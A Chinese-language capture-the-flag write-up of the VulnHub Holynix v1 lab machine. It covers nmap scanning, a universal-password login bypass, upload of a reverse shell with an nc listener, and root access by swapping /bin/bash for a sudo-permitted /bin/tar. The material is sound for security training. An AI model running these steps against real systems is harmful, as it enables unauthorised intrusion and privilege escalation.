文章描述了一位安全研究员使用Nmap进行网络扫描,发现了一台运行Apache和PHP的Linux服务器,并且存在SQL注入、慢lorisDoS攻击漏洞以及可能的CSRF问题。研究员通过上传恶意脚本并利用特定用户权限(如无密码限制的`chown`,`chgrp`,`tar`,`mv`命令)成功获得了root权限。
HOLYNIX: V1
https://www.vulnhub.com/entry/holynix-v1,20/
主机发现
# yunki @ yunki in ~/vulnhub/holynix [19:25:02]
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.6
Host is up (0.00074s latency).
nmap扫描
# yunki @ yunki in ~/vulnhub/holynix [19:26:17]
$ sudo nmap --min-rate 10000 -p- 192.168.54.6
PORT STATE SERVICE
80/tcp open http
MAC Address: 00:0C:29:BC:05:DE (VMware)
# yunki @ yunki in ~/vulnhub/holynix [19:26:30]
$ sudo nmap -sT -sV -O -p80 192.168.54.6
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
MAC Address: 00:0C:29:BC:05:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.24 - 2.6.25
Network Distance: 1 hop
# yunki @ yunki in ~/vulnhub/holynix [19:26:56]
$ sudo nmap -sU -p80 192.168.54.6
PORT STATE SERVICE
80/udp closed http
MAC Address: 00:0C:29:BC:05:DE (VMware)
# yunki @ yunki in ~/vulnhub/holynix [19:27:02]
$ sudo nmap --script=vuln -p80 192.168.54.6
PORT STATE SERVICE
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /login.php: Possible admin folder
| /login/: Login page
| /home/: Potentially interesting folder
| /icons/: Potentially interesting folder w/ directory listing
| /img/: Potentially interesting folder
| /index/: Potentially interesting folder
| /misc/: Potentially interesting folder
| /transfer/: Potentially interesting folder
|_ /upload/: Potentially interesting folder
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.54.6:80/?page=login.php%27%20OR%20sqlspider
| http://192.168.54.6:80/?page=login.php%27%20OR%20sqlspider
| http://192.168.54.6:80/?page=login.php%27%20OR%20sqlspider
| http://192.168.54.6:80/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.54.6:80/?page=login.php%27%20OR%20sqlspider
|_ http://192.168.54.6:80/index.php?page=login.php%27%20OR%20sqlspider
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.54.6
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.54.6:80/?page=login.php
| Form id:
| Form action: /index.php?page=login.php
|
| Path: http://192.168.54.6:80/index.php?page=login.php
| Form id:
|_ Form action: /index.php?page=login.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:BC:05:DE (VMware)
web渗透
可以上传文件,去试试。却发现:
没有上传文件的权限,这里通过查看directory目录,发现有很多用户,尝试万能密码用其他账户登录。
写一个反弹shell,打包成tar.gz文件上传到靶机上,选择自动解压。同时kali开启监听。
这里上传成功了,但是不知道该文件位置,那就扫一目录吧。
这里扫到了upload文件夹,进去却没有看见shell.php,返回来看这里,它说的是上传到Home directory,那就试一下home文件夹。
该用户为eteenenbaum,那就访问http://192.168.54.6/~etenenbaum/shell.php
获取初始shell
# yunki @ yunki in ~ [19:46:59]
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.6] 36909
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
00:16:12 up 33 min, 0 users, load average: 0.01, 0.04, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ whoami
www-data
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:bc:05:de brd ff:ff:ff:ff:ff:ff
inet 192.168.54.6/24 brd 192.168.54.255 scope global eth0
inet6 fe80::20c:29ff:febc:5de/64 scope link
valid_lft forever preferred_lft forever
提权
$ sudo -l
User www-data may run the following commands on this host:
(root) NOPASSWD: /bin/chown
(root) NOPASSWD: /bin/chgrp
(root) NOPASSWD: /bin/tar
(root) NOPASSWD: /bin/mv
# 有四个root权限指令。
# 先把tar备份一下,再将bash 修改为tar。
# 最后sudo tar就是执行sudo /bin/bash,成功得到root权限
$ sudo mv /bin/tar /bin/tar.bak
$ sudo mv /bin/bash /bin/tar
$ sudo tar
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:0c:29:bc:05:de brd ff:ff:ff:ff:ff:ff
inet 192.168.54.6/24 brd 192.168.54.255 scope global eth0
inet6 fe80::20c:29ff:febc:5de/64 scope link
valid_lft forever preferred_lft forever
这里2个都可以,我用的是后者(Tips:不一样)
扫一扫
6112
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
